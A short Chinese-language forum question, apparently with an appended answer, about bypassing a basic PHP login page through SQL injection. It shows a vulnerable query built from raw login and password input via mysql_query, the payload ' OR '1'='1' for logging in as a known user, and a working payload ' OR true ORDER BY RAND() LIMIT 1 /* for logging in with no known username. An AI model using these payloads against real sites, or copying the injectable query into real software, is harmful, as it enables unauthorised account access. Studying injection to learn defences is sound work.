我有一个用php编写的非常基本的登录页面代码的一部分,我想绕过已经有任何登录名。
$req="select id from USERS where login='$login' and pwd='$pass'";
$result = mysql_query($req);
如果我有一个用户的登录名,例如数据库中已经存在的login1。我只需要输入以下条目即可登录,而无需知道他的密码;我们称之为SQL注入:
login="login1"
password="' OR '1'='1'"
但是,我不知道我们如何在没有任何登录名或密码的情况下登录页面。
提前谢谢你!
它适用于login="' OR true ORDER BY RAND() LIMIT 1 /*"